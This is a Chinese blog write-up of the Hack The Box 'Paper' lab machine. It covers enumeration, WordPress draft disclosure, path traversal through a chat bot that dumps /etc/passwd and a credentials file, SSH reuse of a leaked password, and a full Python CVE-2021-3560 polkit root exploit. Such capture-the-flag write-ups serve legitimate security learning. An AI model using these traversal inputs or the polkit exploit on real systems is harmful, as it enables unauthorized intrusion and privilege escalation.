Twoc-Prime

loop{Rust入门中。。}

For Me

QQ: 1191422391
微信: a1191422391
Email: mrtwoc@qq.com

Learn More

标签

Twoc-Prime

loop{Rust入门中。。}

For Me

QQ: 1191422391
微信: a1191422391
Email: mrtwoc@qq.com

Learn More

标签

Hack The Box 博客护网网络安全靶场

937 字

3 分钟

记模拟渗透-HTB-Paper

2022-04-06

网络安全

/

Hack The Box

/

靶场

开始时间：

2022年4月5日10点

msf6 > db_nmap -T4 -A -v 10.10.11.143

扫描到开放端口：

22

80

443

nmap -sV -A 10.10.11.143

22/tcp open ssh OpenSSH 8.0 (protocol 2.0)

80/tcp open http Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)

443/tcp open ssl/http Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)

打开网页后，发现，没有有用的价值

打开F12，看看有啥好东西

在hosts里加上(作用目前不知道。。不加就不能访问)

10.10.11.143 office.paper

打开后发现

在页面底部发现与wordpress有关

使用wpscan扫描一下

wpscan —url http://office.paper/

WordPress 版本为5.2.3

百度一下有没有可利用的东西

找到了这个Exploit

http://office.paper/?static=1&order=asc

返回404

删掉&order=asc再次尝试

http://office.paper/?static=1

看到一个文章

看看内容。。。

发现这么一个内容

Secret Registration URL of new Employee chat system#

http://chat.office.paper/register/8qozr226AhkCHZdyY

再次hosts里，

加上chat.office.paper

访问地址

http://chat.office.paper

地址改成

http://chat.office.paper/register

404了。。

直接访问原地址

http://chat.office.paper/register/8qozr226AhkCHZdyY

发现注册页面。。注册一个呗

随便写一下

马上就来了个消息

bot？什么玩意

这里提到有人在该频道中添加了一个新的机器人，只需要输入recyclops help机器人就会告诉你可以做什么

漏洞利用#

目前可知的信息

我们有了一个可以互动的机器人 recyclops
机器人可以帮我们获得文件
我们无法在频道内发言

OK，到这里思路就很清晰了，我们去找机器人私聊

这里要求他读取test.txt文件

回复文件/home/dwight/sales/test.txt文件不存在，尝试一下是否可以路径穿越

这边构造了一下路径，成功获得/etc/passwd文件

12:49 AM

recyclops file ../../../../etc/passwd

Bot

12:49 AM

<!=====Contents of file ../../../../etc/passwd=====>

root❌0:0:root:/root:/bin/bash

bin❌1:1:bin:/bin:/sbin/nologin

daemon❌2:2:daemon:/sbin:/sbin/nologin

adm❌3:4:adm:/var/adm:/sbin/nologin

lp❌4:7:lp:/var/spool/lpd:/sbin/nologin

sync❌5:0:sync:/sbin:/bin/sync

shutdown❌6:0:shutdown:/sbin:/sbin/shutdown

halt❌7:0:halt:/sbin:/sbin/halt

mail❌8:12:mail:/var/spool/mail:/sbin/nologin

operator❌11:0:operator:/root:/sbin/nologin

games❌12💯games:/usr/games:/sbin/nologin

ftp❌14:50 User:/var/ftp:/sbin/nologin

nobody❌65534:65534 Overflow User:/:/sbin/nologin

dbus❌81:81 message bus:/:/sbin/nologin

systemd-coredump❌999:997 Core Dumper:/:/sbin/nologin

systemd-resolve❌193:193 Resolver:/:/sbin/nologin

tss❌59:59 used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin

polkitd❌998:996 for polkitd:/:/sbin/nologin

geoclue❌997:994 for geoclue:/var/lib/geoclue:/sbin/nologin

rtkit❌172:172:RealtimeKit:/proc:/sbin/nologin

qemu❌107:107 user:/:/sbin/nologin

apache❌48:48:Apache:/usr/share/httpd:/sbin/nologin

cockpit-ws❌996:993 for cockpit-ws:/:/sbin/nologin

pulse❌171:171 System Daemon:/var/run/pulse:/sbin/nologin

usbmuxd❌113:113 user:/:/sbin/nologin

unbound❌995:990 DNS resolver:/etc/unbound:/sbin/nologin

rpc❌32:32 Daemon:/var/lib/rpcbind:/sbin/nologin

gluster❌994:989 daemons:/run/gluster:/sbin/nologin

chrony❌993:987::/var/lib/chrony:/sbin/nologin

libstoragemgmt❌992:986 account for libstoragemgmt:/var/run/lsm:/sbin/nologin

saslauth❌991:76 user:/run/saslauthd:/sbin/nologin

dnsmasq❌985:985 DHCP and DNS server:/var/lib/dnsmasq:/sbin/nologin

radvd❌75:75 user:/:/sbin/nologin

clevis❌984:983 Decryption Framework unprivileged user:/var/cache/clevis:/sbin/nologin

pegasus❌66:65 OpenPegasus WBEM/CIM services:/var/lib/Pegasus:/sbin/nologin

sssd❌983:981 for sssd:/:/sbin/nologin

colord❌982:980 for colord:/var/lib/colord:/sbin/nologin

rpcuser❌29:29 Service User:/var/lib/nfs:/sbin/nologin

setroubleshoot❌981:979::/var/lib/setroubleshoot:/sbin/nologin

pipewire❌980:978 System Daemon:/var/run/pipewire:/sbin/nologin

gdm❌42:42::/var/lib/gdm:/sbin/nologin

gnome-initial-setup❌979:977::/run/gnome-initial-setup/:/sbin/nologin

insights❌978:976 Hat Insights:/var/lib/insights:/sbin/nologin

sshd❌74:74 SSH:/var/empty/sshd:/sbin/nologin

avahi❌70:70 mDNS/DNS-SD Stack:/var/run/avahi-daemon:/sbin/nologin

tcpdump❌72:72::/:/sbin/nologin

mysql❌27:27 Server:/var/lib/mysql:/sbin/nologin

nginx❌977:975 web server:/var/lib/nginx:/sbin/nologin

mongod❌976:974:mongod:/var/lib/mongo:/bin/false

rocketchat❌1001:1001::/home/rocketchat:/bin/bash

dwight❌1004:1004::/home/dwight:/bin/bash

<!=====Contents of file ../../../../etc/passwd=====>

recyclops list

查看当前有什么文件，不知道为什么，会重复一遍

recyclops list ../

查看上级文件里有什么

好像看到个user.txt

访问被拒绝。。

按照大佬提示，hubot里可能有东西

进去看看

在hubot目录中，有一个.env文件，咱们查看一下这个文件

里面的USER和PASSWORD引人注目

<!=====Contents of file ../hubot/.env=====>

export ROCKETCHAT_URL=‘http://127.0.0.1:48320’

export ROCKETCHAT_USER=recyclops

export ROCKETCHAT_PASSWORD=Queenofblad3s!23

export ROCKETCHAT_USESSL=false

export RESPOND_TO_DM=true

export RESPOND_TO_EDITED=true

export PORT=8000

export BIND_ADDRESS=127.0.0.1

<!=====End of file ../hubot/.env=====>

想到之前nmap扫描到22端口开放的ssh

拿着密码试一下

成功了

ssh dwight@10.10.11.143

密码

Queenofblad3s!23

拿到user的flag

[dwight@paper ~]$ cat user.txt

2407edf932ab536de2617761049efcc5

=================================================================

截个全图

=================================================================

ps aux

看看有什么进程

大佬提示 polkitd 有可利用漏洞

msf扫描知道

CVE-2021-3560

可以利用

msf6 > use exploit/linux/local/polkit_dbus_auth_bypass

f= open(“CVE-2021-3560.py”,“w+”)

利用python3 创建个py文件

将以下python代码写进CVE-2021-3560.py里

vim CVE-2021-3560.py

按i 进入插入模式，这里直接复制

完成后按esc

再输入保存退出

=================================================================

1
importos
2
importsys
3
importtime
4
importsubprocess
5
importrandom
6
importpwd
7
print ("**************")
8
print("Exploit: Privilege escalation with polkit - CVE-2021-3560")
9
print("Exploit code written by Ahmad Almorabea @almorabea")
10
print("Original exploit author: Kevin Backhouse ")
11
print("For more details check this out: https://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/")
12
print ("**************")
13
print("[+] Starting the Exploit ")
14
time.sleep(3)
15
check = True
16
counter = 0
17
whilecheck:
18
    counter = counter +1
19
    process = subprocess.Popen(['dbus-send','--system','--dest=org.freedesktop.Accounts','--type=method_call','--print-reply','/org/freedesktop/Accounts','org.freedesktop.Accounts.CreateUser','string:ahmed','string:"Ahmad Almorabea','int32:1'])
20
    try:
21
            #print('1 - Running in process', process.pid)
22
        Random = random.uniform(0.006,0.009)
23
        process.wait(timeout=Random)
24
        process.kill()
25
    exceptsubprocess.TimeoutExpired:
26
            #print('Timed out - killing', process.pid)
27
            process.kill()
28
    user = subprocess.run(['id', 'ahmed'], stdout=subprocess.PIPE).stdout.decode('utf-8')
29
    ifuser.find("uid") != -1:
30
        print("[+] User Created with the name of ahmed")
31
        print("[+] Timed out at: "+str(Random))
32
        check =False
33
        break
34
    ifcounter > 2000:
35
        print("[-] Couldn't add the user, try again it may work")
36
        sys.exit(0)
37
foriinrange(200):
38
    #print(i)
39
    uid = "/org/freedesktop/Accounts/User"+str(pwd.getpwnam('ahmed').pw_uid)
40
    #In case you need to put a password un-comment the code below and put your password after string:yourpassword'
41
    password = "string:"
42
    #res = subprocess.run(['openssl', 'passwd','-5',password], stdout=subprocess.PIPE).stdout.decode('utf-8')
43
    #password = f"string:{res.rstrip()}"
44
    process = subprocess.Popen(['dbus-send','--system','--dest=org.freedesktop.Accounts','--type=method_call','--print-reply',uid,'org.freedesktop.Accounts.User.SetPassword',password,'string:GoldenEye'])
45
    try:
46
            #print('1 - Running in process', process.pid)
47
            Random = random.uniform(0.006,0.009)
48
            process.wait(timeout=Random)
49
            process.kill()
50
    exceptsubprocess.TimeoutExpired:
51
            #print('Timed out - killing', process.pid)
52
            process.kill()
53
print("[+] Timed out at: " + str(Random))
54
print("[+] Exploit Completed, Your new user is 'Ahmed' just log into it like, 'su ahmed', and then 'sudo su' to root ")
55
p = subprocess.call("(su ahmed -c 'sudo su')", shell=True)